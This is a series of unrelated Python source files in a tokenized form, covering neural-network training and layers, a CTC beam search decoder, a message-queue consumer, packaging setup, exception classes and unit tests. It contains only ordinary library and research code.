self.grad_norm step)<line_sep>writer.flush()<line_sep>self.summary_writer=writer<block_end><block_end><def_stmt>_train_impl replica_id model dataset args params<block_start>torch.backends.cudnn.benchmark=<true><line_sep>opt=torch.optim.Adam(model.parameters() lr=params.learning_rate)<line_sep>learner=WaveGradLearner(args.model_dir model dataset opt params fp16=args.fp16)<line_sep>learner.is_master=(replica_id<eq>0)<line_sep>learner.restore_from_checkpoint()<line_sep>learner.train(max_steps=args.max_steps)<block_end><def_stmt>train args params<block_start>dataset=dataset_from_path(args.data_dirs params)<line_sep>model=WaveGrad(params).cuda()<line_sep>_train_impl(0 model dataset args params)<block_end><def_stmt>train_distributed replica_id replica_count port args params<block_start>os.environ['MASTER_ADDR']='localhost'<line_sep>os.environ['MASTER_PORT']=str(port)<line_sep>torch.distributed.init_process_group('nccl' rank=replica_id world_size=replica_count)<line_sep>device=torch.device('cuda' replica_id)<line_sep>torch.cuda.set_device(device)<line_sep>model=WaveGrad(params).to(device)<line_sep>model=DistributedDataParallel(model device_ids=[replica_id])<line_sep>_train_impl(replica_id model dataset_from_path(args.data_dirs params is_distributed=<true>) args params)<block_end>
<import_stmt>os<import_from_stmt>rlbot.agents.base_independent_agent BaseIndependentAgent<import_from_stmt>rlbot.botmanager.helper_process_request HelperProcessRequest<class_stmt>DroneAgent(BaseIndependentAgent)# Path to the hivemind helperprocess python file. <block_start>hive_path=<none><line_sep># Bots with the same key will be part of the same hivemind. hive_key=<none><line_sep># Name of your hivemind that shows up in the console. hive_name=<none><def_stmt>__init__ self name team index<block_start>super().__init__(name team index)<if_stmt>self.hive_path<is><none><block_start><raise>NotImplementedError('You need to specify a path to the hivemind file.')<block_end><if_stmt>self.hive_key<is><none><block_start><raise>NotImplementedError('You need to specify a key for your hivemind.')<block_end><if_stmt>self.hive_name<is><none><block_start><raise>NotImplementedError('You need to specify a name for your hivemind.')<block_end><block_end><def_stmt>run_independently self terminate_request_event<block_start><pass><block_end><def_stmt>get_helper_process_request self<arrow>HelperProcessRequest<block_start><if_stmt><not>os.path.isfile(self.hive_path)<block_start><raise>FileNotFoundError(f'Could not find file: {self.hive_path}')<block_end># Appends hive_path to key so that hiveminds in different places don't compete. # Appends team to key so that each team has its own hivemind. key=f'{self.hive_path}{self.hive_key}{self.team}'<line_sep># Creates request for helper process. options={'name':self.hive_name}<line_sep><return>HelperProcessRequest(self.hive_path key options=options)<block_end><block_end>
<import_stmt>pyximport<line_sep>pyximport.install()<import_stmt>json<import_stmt>os<import_stmt>subprocess<import_from_stmt>delorean epoch<import_from_stmt>raven Client<import_from_stmt>gryphon.data_service.consts *<import_from_stmt>gryphon.data_service.queue_consumer QueueConsumer<import_from_stmt>gryphon.lib session<import_from_stmt>gryphon.lib.models.emeraldhavoc.exchange_volume ExchangeVolume<import_from_stmt>gryphon.lib.money Money<line_sep>s=Client(dsn=os.environ.get('SENTRY_DSN'))<def_stmt>exchange_volumes_consumer_function message db<block_start>subprocess.call(['touch' 'monit/heartbeat/exchange_volumes_consumer.txt'])<line_sep>exchange_volume_json=json.loads(message)<line_sep>timestamp=epoch(exchange_volume_json['timestamp']).datetime<line_sep>exchange=exchange_volume_json['exchange_name']<line_sep>exch_vol_money=Money(exchange_volume_json['volume'] 'BTC')<line_sep>t=ExchangeVolume(exchange_volume=exch_vol_money exchange=exchange timestamp=timestamp )<line_sep>db.add(t)<line_sep>session.commit_mysql_session(db)<block_end><def_stmt>main <block_start>db=session.get_a_gds_db_mysql_session()<try_stmt><block_start>volume_consumer=QueueConsumer(os.environ.get('AMPQ_ADDRESS') exchange_volumes_consumer_function db EXCHANGE EXCHANGE_TYPE EXCHANGE_VOLUME_BINDING_KEY EXCHANGE_VOLUME_QUEUE )<line_sep>volume_consumer.run()<block_end><except_stmt>KeyboardInterrupt<block_start>volume_consumer.stop()<block_end><except_stmt><block_start>s.captureException()<block_end><finally_stmt><block_start>db.remove()<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
# -*- coding: utf-8 -*- '''Convolutional layers "scan" over input data.'''<import_from_future_stmt> division<import_stmt>numpy<as>np<import_stmt>theano<import_stmt>theano.tensor<as>TT<import_from_stmt>. base<import_from_stmt>.. util<line_sep>__all__=['Conv1' 'Conv2' 'Pool1' 'Pool2' ]<class_stmt>Convolution(base.Layer)<block_start>'''Convolution layers convolve filters over the input arrays. Parameters ---------- filter_size : (int, int) Size of the convolution filters for this layer. stride : (int, int), optional Apply convolutions with this stride; i.e., skip this many samples between convolutions. Defaults to (1, 1)---that is, no skipping. border_mode : str, optional Compute convolutions with this border mode. Defaults to 'valid'. '''<def_stmt>__init__ self filter_size stride=(1 1) border_mode='valid' **kwargs<block_start>self.filter_size=filter_size<line_sep>self.stride=stride<line_sep>self.border_mode=border_mode<line_sep>super(Convolution self).__init__(**kwargs)<block_end><def_stmt>log self<block_start>inputs=', '.join('"{0}" {1}'.format(*ns)<for>ns self._input_shapes.items())<line_sep>util.log('layer {0.__class__.__name__} "{0.name}" '<concat>'{0.output_shape} {1} {0.border_mode} '<concat>'filters {2}{3} from {4}' self getattr(self.activate 'name' self.activate) 'x'.join(str(i)<for>i self.filter_size) ''.join('+{}'.format(i)<for>i self.stride) inputs)<line_sep>util.log('learnable parameters: {}' self.log_params())<block_end><def_stmt>add_conv_weights self name mean=0 std=<none> sparsity=0<block_start>'''Add a convolutional weight array to this layer's parameters. Parameters ---------- name : str Name of the parameter to add. mean : float, optional Mean value for randomly-initialized weights. Defaults to 0. std : float, optional Standard deviation of initial matrix values. Defaults to :math:`1 / sqrt(n_i + n_o)`. sparsity : float, optional Fraction of weights to set to zero. Defaults to 0. '''<line_sep>nin=self.input_size<line_sep>nout=self.output_size<line_sep>mean=self.kwargs.get('mean_{}'.format(name) self.kwargs.get('mean' mean))<line_sep>std=self.kwargs.get('std_{}'.format(name) self.kwargs.get('std' std<or>1/np.sqrt(nin+nout)))<line_sep>sparsity=self.kwargs.get('sparsity_{}'.format(name) self.kwargs.get('sparsity' sparsity))<line_sep>arr=np.zeros((nout nin)+self.filter_size util.FLOAT)<for_stmt>r range(self.filter_size[0])<block_start><for_stmt>c range(self.filter_size[1])<block_start>arr[: : r c]=util.random_matrix(nout nin mean std sparsity=sparsity rng=self.rng)<block_end><block_end>self._params.append(theano.shared(arr name=self._fmt(name)))<block_end><block_end><class_stmt>Conv1(Convolution)<block_start>'''1-dimensional convolutions run over one data axis. Notes ----- One-dimensional convolution layers are typically used in ``theanets`` models that use recurrent inputs and outputs, i.e., :class:`theanets.recurrent.Autoencoder`, :class:`theanets.recurrent.Predictor`, :class:`theanets.recurrent.Classifier`, or :class:`theanets.recurrent.Regressor`. The convolution will be applied over the "time" dimension (axis 1). Parameters ---------- filter_size : int Length of the convolution filters for this layer. stride : int, optional Apply convolutions with this stride; i.e., skip this many samples between convolutions. Defaults to 1, i.e., no skipping. border_mode : str, optional Compute convolutions with this border mode. Defaults to 'valid'. '''<def_stmt>__init__ self filter_size stride=1 border_mode='valid' **kwargs<block_start>super(Conv1 self).__init__(filter_size=(1 filter_size) stride=(1 stride) border_mode=border_mode **kwargs)<block_end><def_stmt>setup self<block_start>self.add_conv_weights('w')<line_sep>self.add_bias('b' self.output_size)<block_end><def_stmt>resolve_outputs self<block_start><if_stmt>self.input_shape<is><none><or>self.input_shape[0]<is><none><block_start><return>super(Conv1 self).resolve_outputs()<block_end>image=np.array(self.input_shape[:-1])<line_sep>kernel=np.array(self.filter_size)<line_sep>result=image<if_stmt>self.border_mode<eq>'full'<block_start>result=image+kernel-1<block_end><if_stmt>self.border_mode<eq>'valid'<block_start>result=image-kernel+1<block_end>self._output_shapes['out']=tuple(result)+(self.kwargs['size'] )<block_end><def_stmt>transform self inputs# input is: (batch, time, input) # conv2d wants: (batch, input, 1, time) <block_start>x=inputs[self.input_name].dimshuffle(0 2 'x' 1)<line_sep>pre=TT.nnet.conv2d(x self.find('w') image_shape=(<none> self.input_size 1 <none>) filter_shape=(self.output_size self.input_size)+self.filter_size border_mode=self.border_mode subsample=self.stride ).dimshuffle(0 3 1 2)[: : : 0]+self.find('b')<line_sep># conv2d output is: (batch, output, 1, time) # we want: (batch, time, output) # (have to do [:, :, :, 0] to remove unused trailing dimension) <return>dict(pre=pre out=self.activate(pre)) []<block_end><block_end><class_stmt>Conv2(Convolution)<block_start>'''2-dimensional convolutions run over two data axes. Two-dimensional convolution layers are standard image processing techniques. In theanets, these layers expect an input consisting of (num-examples, width, height, num-channels). Parameters ---------- filter_size : (int, int) Size of the convolution filters for this layer. stride : (int, int), optional Apply convolutions with this stride; i.e., skip this many samples between convolutions. Defaults to (1, 1), i.e., no skipping. border_mode : str, optional Compute convolutions with this border mode. Defaults to 'valid'. '''<def_stmt>setup self<block_start>self.add_conv_weights('w')<line_sep>self.add_bias('b' self.output_size)<block_end><def_stmt>resolve_outputs self<block_start>shape=self.input_shape<if_stmt>shape<is><none><or>shape[0]<is><none><or>shape[1]<is><none><block_start><return>super(Conv2 self).resolve_outputs()<block_end>image=np.array(shape[:-1])<line_sep>kernel=np.array(self.filter_size)<line_sep>result=image<if_stmt>self.border_mode<eq>'full'<block_start>result=image+kernel-1<block_end><if_stmt>self.border_mode<eq>'valid'<block_start>result=image-kernel+1<block_end>self._output_shapes['out']=tuple(result)+(self.kwargs['size'] )<block_end><def_stmt>transform self inputs# input is: (batch, width, height, input) # conv2d wants: (batch, input, width, height) <block_start>x=inputs[self.input_name].dimshuffle(0 3 1 2)<line_sep>pre=TT.nnet.conv2d(x self.find('w') image_shape=(<none> self.input_size <none> <none>) filter_shape=(self.output_size self.input_size)+self.filter_size border_mode=self.border_mode subsample=self.stride ).dimshuffle(0 2 3 1)+self.find('b')<line_sep># conv2d output is: (batch, output, width, height) # we want: (batch, width, height, output) <return>dict(pre=pre out=self.activate(pre)) []<block_end><block_end><class_stmt>Pooling(base.Layer)<block_start>''' '''<block_end><class_stmt>Pool1(Pooling)<block_start>''' '''<def_stmt>transform self inputs# input is: (batch, time, input) # conv2d wants: (batch, input, time, 1) <block_start>x=inputs[self.input_name].dimshuffle(0 2 1 'x')<line_sep>pre=TT.signal.downsample.max_pool_2d(x self.pool_size st=self.stride mode=self.mode ).dimshuffle(0 2 1 3)[: : : 0]<line_sep># conv2d output is: (batch, output, time, 1) # we want: (batch, time, output) <return>dict(pre=pre out=self.activate(pre)) []<block_end><block_end><class_stmt>Pool2(Pooling)<block_start>''' '''<def_stmt>transform self inputs# input is: (batch, width, height, input) # conv2d wants: (batch, input, width, height) <block_start>x=inputs[self.input_name].dimshuffle(0 3 1 2)<line_sep>pre=TT.signal.downsample.max_pool_2d(x self.pool_size st=self.stride mode=self.mode ).dimshuffle(0 2 3 1)<line_sep># conv2d output is: (batch, output, width, height) # we want: (batch, width, height, output) <return>dict(pre=pre out=self.activate(pre)) []<block_end><block_end>
<import_from_stmt>io open<import_from_stmt>setuptools find_packages setup<line_sep>extras={'serving':['pydantic' 'uvicorn' 'fastapi'] 'serving-tf':['pydantic' 'uvicorn' 'fastapi'] 'serving-torch':['pydantic' 'uvicorn' 'fastapi' 'torch']}<line_sep>extras['all']=[package<for>package extras.values()]<line_sep>setup(name="s2s-ft" version="0.0.1" author="UniLM Team" author_email="<EMAIL>" description="Fine-Tuning Bidirectional Transformers for Sequence-to-Sequence Learning" long_description=open("README.md" "r" encoding='utf-8').read() long_description_content_type="text/markdown" keywords='Fine-Tuning Bidirectional Transformers for Sequence-to-Sequence Learning' license='Apache' url="https://github.com/microsoft/unilm/tree/master/s2s-ft" packages=find_packages(exclude=["*.tests" "*.tests.*" "tests.*" "tests"]) install_requires=['numpy' 'boto3' 'requests' 'tqdm' 'regex != 2019.12.17' 'sentencepiece' 'sacremoses' 'tensorboardX' 'transformers <= 2.10.0'] extras_require=extras python_requires='>=3.5.0' classifiers=['Programming Language :: Python :: 3' ] )<line_sep>
# - Generated by tools/entrypoint_compiler.py: do not edit by hand """ DisagreementDiversityMeasure """<import_from_stmt>..utils.entrypoints Component<def_stmt>disagreement_diversity_measure **params<block_start>""" **Description** None """<line_sep>entrypoint_name='DisagreementDiversityMeasure'<line_sep>settings={}<line_sep>component=Component(name=entrypoint_name settings=settings kind='EnsembleBinaryDiversityMeasure')<line_sep><return>component<block_end>
# From https://github.com/githubharald/CTCDecoder # #MIT License #Copyright (c) 2018 <NAME> #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in all #copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #SOFTWARE. <import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>numpy<as>np<class_stmt>BeamEntry<block_start>"information about one single beam at specific time-step"<def_stmt>__init__ self<block_start>self.prTotal=0# blank and non-blank self.prNonBlank=0# non-blank self.prBlank=0# blank self.prText=1# LM score self.lmApplied=<false># flag if LM was already applied to this beam self.labeling=()<block_end><block_end># beam-labeling <class_stmt>BeamState<block_start>"information about the beams at specific time-step"<def_stmt>__init__ self<block_start>self.entries={}<block_end><def_stmt>norm self<block_start>"length-normalise LM score"<for_stmt>(k _) self.entries.items()<block_start>labelingLen=len(self.entries[k].labeling)<line_sep>self.entries[k].prText=self.entries[k].prText<power>(1.0/(labelingLen<if>labelingLen<else>1.0))<block_end><block_end><def_stmt>sort self<block_start>"return beam-labelings, sorted by probability"<line_sep>beams=[v<for>(_ v) self.entries.items()]<line_sep>sortedBeams=sorted(beams reverse=<true> key=<lambda>x:x.prTotal<times>x.prText)<line_sep><return>[x.labeling<for>x sortedBeams]<block_end><block_end><def_stmt>applyLM parentBeam childBeam classes lm<block_start>"calculate LM score of child beam by taking score from parent beam and bigram probability of last two chars"<if_stmt>lm<and><not>childBeam.lmApplied<block_start>c1=classes[parentBeam.labeling[-1]<if>parentBeam.labeling<else>classes.index(' ')]# first char c2=classes[childBeam.labeling[-1]]# second char lmFactor=0.01# influence of language model bigramProb=lm.getCharBigram(c1 c2)<power>lmFactor# probability of seeing first and second char next to each other childBeam.prText=parentBeam.prText<times>bigramProb# probability of char sequence childBeam.lmApplied=<true><block_end><block_end># only apply LM once per beam entry <def_stmt>addBeam beamState labeling<block_start>"add beam if it does not yet exist"<if_stmt>labeling<not><in>beamState.entries<block_start>beamState.entries[labeling]=BeamEntry()<block_end><block_end><def_stmt>ctcBeamSearch mat classes lm beamWidth<block_start>"beam search as described by the paper of Hwang et al. and the paper of Graves et al."<line_sep>blankIdx=len(classes)<line_sep>maxT,maxC=mat.shape<line_sep># initialise beam state last=BeamState()<line_sep>labeling=()<line_sep>last.entries[labeling]=BeamEntry()<line_sep>last.entries[labeling].prBlank=1<line_sep>last.entries[labeling].prTotal=1<line_sep># go over all time-steps <for_stmt>t range(maxT)<block_start>curr=BeamState()<line_sep># get beam-labelings of best beams bestLabelings=last.sort()[0:beamWidth]<line_sep># go over best beams <for_stmt>labeling bestLabelings# probability of paths ending with a non-blank <block_start>prNonBlank=0<line_sep># in case of non-empty beam <if_stmt>labeling# probability of paths with repeated last char at the end <block_start><try_stmt><block_start>prNonBlank=last.entries[labeling].prNonBlank<times>mat[t labeling[-1]]<block_end><except_stmt>FloatingPointError<block_start>prNonBlank=0<block_end><block_end># probability of paths ending with a blank prBlank=(last.entries[labeling].prTotal)<times>mat[t blankIdx]<line_sep># add beam at current time-step if needed addBeam(curr labeling)<line_sep># fill in data curr.entries[labeling].labeling=labeling<line_sep>curr.entries[labeling].prNonBlank<augadd>prNonBlank<line_sep>curr.entries[labeling].prBlank<augadd>prBlank<line_sep>curr.entries[labeling].prTotal<augadd>prBlank+prNonBlank<line_sep>curr.entries[labeling].prText=last.entries[labeling].prText# beam-labeling not changed, therefore also LM score unchanged from curr.entries[labeling].lmApplied=<true># LM already applied at previous time-step for this beam-labeling # extend current beam-labeling <for_stmt>c range(maxC-1)# add new char to current beam-labeling <block_start>newLabeling=labeling+(c )<line_sep># if new labeling contains duplicate char at the end, only consider paths ending with a blank <if_stmt>labeling<and>labeling[-1]<eq>c<block_start>prNonBlank=mat[t c]<times>last.entries[labeling].prBlank<block_end><else_stmt><block_start>prNonBlank=mat[t c]<times>last.entries[labeling].prTotal<block_end># add beam at current time-step if needed addBeam(curr newLabeling)<line_sep># fill in data curr.entries[newLabeling].labeling=newLabeling<line_sep>curr.entries[newLabeling].prNonBlank<augadd>prNonBlank<line_sep>curr.entries[newLabeling].prTotal<augadd>prNonBlank<line_sep># apply LM applyLM(curr.entries[labeling] curr.entries[newLabeling] classes lm)<block_end><block_end># set new beam state last=curr<block_end># normalise LM scores according to beam-labeling-length last.norm()<line_sep># sort by probability bestLabelings=last.sort()[:beamWidth]# get most probable labeling output=[]<for_stmt>bestLabeling bestLabelings# map labels to chars <block_start>res=''<for_stmt>l bestLabeling<block_start>res<augadd>classes[l]<block_end>output.append(res)<block_end><return>output<block_end><def_stmt>testBeamSearch <block_start>"test decoder"<line_sep>classes='ab'<line_sep>mat=np.array([[0.4 0 0.6] [0.4 0 0.6]])<line_sep>print('Test beam search')<line_sep>expected='a'<line_sep>actual=ctcBeamSearch(mat classes <none>)<line_sep>print('Expected: "'+expected+'"')<line_sep>print('Actual: "'+actual+'"')<line_sep>print('OK'<if>expected<eq>actual<else>'ERROR')<block_end><if_stmt>__name__<eq>'__main__'<block_start>testBeamSearch()<block_end>
# # Copyright SAS Institute # # Licensed under the Apache License, Version 2.0 (the License); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # <class_stmt>SASConfigNotFoundError(Exception)<block_start><def_stmt>__init__ self path:str<block_start>self.path=path<block_end><def_stmt>__str__ self<block_start><return>'Configuration path {} does not exist.'.format(self.path)<block_end><block_end><class_stmt>SASConfigNotValidError(Exception)<block_start><def_stmt>__init__ self defn:str msg:str=<none><block_start>self.defn=defn<if>defn<else>'N/A'<line_sep>self.msg=msg<block_end><def_stmt>__str__ self<block_start><return>'Configuration definition {} is not valid. {}'.format(self.defn self.msg)<block_end><block_end><class_stmt>SASIONotSupportedError(Exception)<block_start><def_stmt>__init__ self method:str alts:list=<none><block_start>self.method=method<line_sep>self.alts=alts<block_end><def_stmt>__str__ self<block_start><if_stmt>self.alts<is><not><none><block_start>alt_text='Try the following: {}'.format(', '.join(self.alts))<block_end><else_stmt><block_start>alt_text=''<block_end><return>'Cannot use {} I/O module on Windows. {}'.format(self.method alt_text)<block_end><block_end><class_stmt>SASHTTPauthenticateError(Exception)<block_start><def_stmt>__init__ self msg:str<block_start>self.msg=msg<block_end><def_stmt>__str__ self<block_start><return>'Failure in GET AuthToken.\n {}'.format(self.msg)<block_end><block_end><class_stmt>SASHTTPconnectionError(Exception)<block_start><def_stmt>__init__ self msg:str<block_start>self.msg=msg<block_end><def_stmt>__str__ self<block_start><return>'Failure in GET Connection.\n {}'.format(self.msg)<block_end><block_end><class_stmt>SASHTTPsubmissionError(Exception)<block_start><def_stmt>__init__ self msg:str<block_start>self.msg=msg<block_end><def_stmt>__str__ self<block_start><return>'Failure in submit().\n {}'.format(self.msg)<block_end><block_end>
<import_from_stmt>typing List<import_stmt>matplotlib.pyplot<as>plt<import_stmt>numpy<as>np<line_sep>BG_COLOR="lavender"<line_sep>FG_COLORS=["b" "g" "r" "c" "m" "y" "tab:orange" "tab:purple" "limegreen" "yellow" "tab:brown" ]<def_stmt>make_animation_from_data features:np.ndarray labels:np.ndarray labelled_at:np.ndarray classes:List[str]<arrow>List[np.ndarray]<block_start>""" Make an animation that show the progress of labelling. Args: features: 2d features representation of the inputs. Shape [samples, 2] labels: Label id for each inputs. Shape [samples] labelled_at: Index at which the input was labelled. Shape [samples] classes: List of classes. Returns: Animated frames of the labelling process. You can then save it locally with: `imageio.mimsave('output.gif', frames, fps=3)` """<assert_stmt>features.ndim<eq>2<and>features.shape[-1]<eq>2 "Can only plot 2d points!"<line_sep>frames=[]<for_stmt>frame_id reversed(range(np.max(labelled_at)))# New frame <block_start>fig,ax=plt.subplots(figsize=(10 10))<line_sep># Filter stuff currently_labelled=labelled_at<g>frame_id<line_sep>unlabelled_features=features[~currently_labelled]<line_sep>labelled_features=features[currently_labelled]<line_sep>labelled_labels=labels[currently_labelled]<line_sep>unique_labels=np.unique(labelled_labels)<line_sep>ax.scatter(unlabelled_features[: 0] unlabelled_features[: 1] c=BG_COLOR label="Unlabelled" marker="x" zorder=2 )<for_stmt>color,label_name,label_id zip(FG_COLORS classes unique_labels)<block_start>label_mask=labelled_labels<eq>label_id<line_sep>pts=labelled_features[label_mask]<line_sep>ax.scatter(pts[: 0] pts[: 1] c=color label=label_name marker="x" zorder=2)<block_end>ax.set_title("{} : {}/{}".format("Labelling progress" currently_labelled.sum() len(currently_labelled)))<line_sep>ax.legend(loc="best" ncol=1 prop={"size":15} markerscale=3 fancybox=<true> shadow=<true>)<line_sep>fig.set_size_inches(15 10.0)<line_sep>fig.canvas.draw()<line_sep>image=np.frombuffer(fig.canvas.tostring_rgb() dtype="uint8")<line_sep>image=image.reshape(fig.canvas.get_width_height()[::-1]+(3 ))<line_sep>frames.append(image)<line_sep>plt.close(fig)<block_end><return>frames<block_end><if_stmt>__name__<eq>"__main__"<block_start><import_from_stmt>sklearn.datasets make_classification<import_stmt>imageio<line_sep># 2D input to mimic a t-SNE-like shape. X,y=make_classification(n_features=2 n_redundant=0 n_informative=2 random_state=1 n_clusters_per_class=1 n_classes=3 )<line_sep>labelled_at=np.random.randint(0 100 size=[X.shape[0]])<line_sep>class_name=["cow" "dog" "cat"]<line_sep>frames=make_animation_from_data(X y labelled_at class_name)<line_sep>imageio.mimsave("output.gif" frames fps=3)<block_end>
<import_from_stmt>packaging.version Version<import_stmt>pip_audit._util<as>util<def_stmt>test_python_version <block_start>v=util.python_version()<assert_stmt>v<is><not><none><assert_stmt>isinstance(v Version)<block_end>
# Copyright (c) 2017-present, Facebook, Inc. # All rights reserved. # # This source code is licensed under the license found in the LICENSE file in # the root directory of this source tree. An additional grant of patent rights # can be found in the PATENTS file in the same directory. """ A modified version of the legacy DistributedDataParallel module that uses c10d communication primitives. This is necessary for models that have conditional computation (e.g., AdaptiveSoftmax) and which therefore do not work with the c10d version of DDP. This version also supports the *accumulate_grads* feature, which allows faster training with `--update-freq`. """<import_stmt>copy<import_stmt>torch<import_from_stmt>torch nn<import_from_stmt>torch.autograd Variable<import_from_stmt>. distributed_utils<class_stmt>LegacyDistributedDataParallel(nn.Module)<block_start>"""Implements distributed data parallelism at the module level. A simplified version of :class:`torch.nn.parallel.DistributedDataParallel`. This version uses a c10d process group for communication and does not broadcast buffers. Args: module (~torch.nn.Module): module to be parallelized world_size (int): number of parallel workers process_group (optional): the c10d process group to be used for distributed data all-reduction. If None, the default process group will be used. buffer_size (int, optional): number of elements to buffer before performing all-reduce (default: 256M). """<def_stmt>__init__ self module world_size process_group=<none> buffer_size=2<power>28<block_start>super().__init__()<line_sep>self.module=module<line_sep>self.world_size=world_size<line_sep>self.process_group=process_group<line_sep># Never use a bigger buffer than the number of model params self.buffer_size=min(buffer_size sum(p.numel()<for>p module.parameters()))<line_sep>self.buffer=<none><line_sep># Flag used by the NCCL backend to make sure we only reduce gradients # one time in the execution engine self.need_reduction=<false><line_sep># We can also forcibly accumulate grads locally and only do the # all-reduce at some later time self.accumulate_grads=<false><line_sep># For NCCL backend, since every single NCCL call is asynchoronous, we # therefore directly enqueue all the NCCL reduction calls to the # default CUDA stream without spawning up other reduction threads. # This achieves the best performance. self._register_grad_hook()<block_end><def_stmt>__getstate__ self<block_start>attrs=copy.copy(self.__dict__)<line_sep><return>attrs<block_end><def_stmt>__setstate__ self state<block_start>super().__setstate__(state)<line_sep>self._register_grad_hook()<block_end><def_stmt>forward self *inputs **kwargs<block_start><return>self.module(*inputs **kwargs)<block_end><def_stmt>_register_grad_hook self<block_start>""" This function registers the callback all-reduction function for the NCCL backend. All gradients will be all reduced in one single step. The NCCL reduction will directly be enqueued into the default CUDA stream. Therefore, no synchronization is needed. """<def_stmt>all_reduce params<block_start>buffer=self.buffer<line_sep>nonzero_buffer=<false><if_stmt>len(params)<g>1<block_start>offset=0<for_stmt>p params<block_start>sz=p.numel()<if_stmt>p.grad<is><not><none><block_start>buffer[offset:offset+sz].copy_(p.grad.data.view(-1))<line_sep>nonzero_buffer=<true><block_end><else_stmt><block_start>buffer[offset:offset+sz].zero_()<block_end>offset<augadd>sz<block_end><block_end><else_stmt># we only have a single grad to all-reduce <block_start>p=params[0]<if_stmt>p.grad<is><not><none><block_start>buffer=p.grad.data<line_sep>nonzero_buffer=<true><block_end><elif_stmt>p.numel()<le>self.buffer.numel()<block_start>buffer=buffer[:p.numel()]<line_sep>buffer.zero_()<block_end><else_stmt><block_start>buffer=torch.zeros_like(p)<block_end><block_end><if_stmt>nonzero_buffer<block_start>buffer.div_(self.world_size)<block_end>distributed_utils.all_reduce(buffer self.process_group)<line_sep># copy all-reduced grads back into their original place offset=0<for_stmt>p params<block_start>sz=p.numel()<if_stmt>p.grad<is><not><none><block_start>p.grad.data.copy_(buffer[offset:offset+sz].view_as(p))<block_end><else_stmt><block_start>p.grad=buffer[offset:offset+sz].view_as(p).clone()<block_end>offset<augadd>sz<block_end><block_end><def_stmt>reduction_fn # This function only needs to be called once <block_start><if_stmt><not>self.need_reduction<or>self.accumulate_grads<block_start><return><block_end>self.need_reduction=<false><if_stmt>self.buffer<is><none><block_start>self.buffer=next(self.module.parameters()).new(self.buffer_size)<block_end># All-reduce the gradients in buckets offset=0<line_sep>buffered_params=[]<for_stmt>param self.module.parameters()<block_start><if_stmt><not>param.requires_grad<block_start><continue><block_end><if_stmt>param.grad<is><none><block_start>param.grad=torch.zeros_like(param)<block_end><if_stmt>param.grad.requires_grad<block_start><raise>RuntimeError("DistributedDataParallel only works "<concat>"with gradients that don't require "<concat>"grad")<block_end>sz=param.numel()<if_stmt>sz<g>self.buffer.numel()# all-reduce big params directly <block_start>all_reduce([param])<block_end><else_stmt><block_start><if_stmt>offset+sz<g>self.buffer.numel()<block_start>all_reduce(buffered_params)<line_sep>offset=0<line_sep>buffered_params.clear()<block_end>buffered_params.append(param)<line_sep>offset<augadd>sz<block_end><block_end><if_stmt>len(buffered_params)<g>0<block_start>all_reduce(buffered_params)<block_end><block_end># Now register the reduction hook on the parameters <for_stmt>p self.module.parameters()<block_start><def_stmt>allreduce_hook *unused<block_start>self.need_reduction=<true><line_sep>Variable._execution_engine.queue_callback(reduction_fn)<block_end><if_stmt>p.requires_grad<block_start>p.register_hook(allreduce_hook)<block_end><block_end><block_end><block_end>
# -*- coding: utf-8 -*- # Copyright (c) 2020 Nekokatt # Copyright (c) 2021 davfsa # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. <import_stmt>asyncio<import_stmt>time<import_stmt>mock<import_stmt>pytest<import_from_stmt>hikari errors<import_from_stmt>hikari.impl buckets<import_from_stmt>hikari.impl rate_limits<import_from_stmt>hikari.internal routes<import_from_stmt>hikari.internal time<as>hikari_date<import_from_stmt>tests.hikari hikari_test_helpers<class_stmt>TestRESTBucket<block_start>@pytest.fixture()<def_stmt>template self<block_start><return>routes.Route("GET" "/foo/bar")<block_end>@pytest.fixture()<def_stmt>compiled_route self template<block_start><return>routes.CompiledRoute("/foo/bar" template "1a2b3c")<block_end>@pytest.mark.asyncio()<async_keyword><def_stmt>test_async_context_manager self compiled_route<block_start><with_stmt>mock.patch.object(asyncio "Lock")<as>lock<block_start>lock.return_value.acquire=mock.AsyncMock()<with_stmt>mock.patch.object(buckets.RESTBucket "acquire" new=mock.AsyncMock())<as>acquire<block_start><async_keyword><with_stmt>buckets.RESTBucket("spaghetti" compiled_route float("inf"))<block_start>acquire.assert_awaited_once_with()<line_sep>lock.return_value.release.assert_not_called()<block_end>lock.return_value.release.assert_called_once_with()<block_end><block_end><block_end>@pytest.mark.parametrize("name" ["spaghetti" 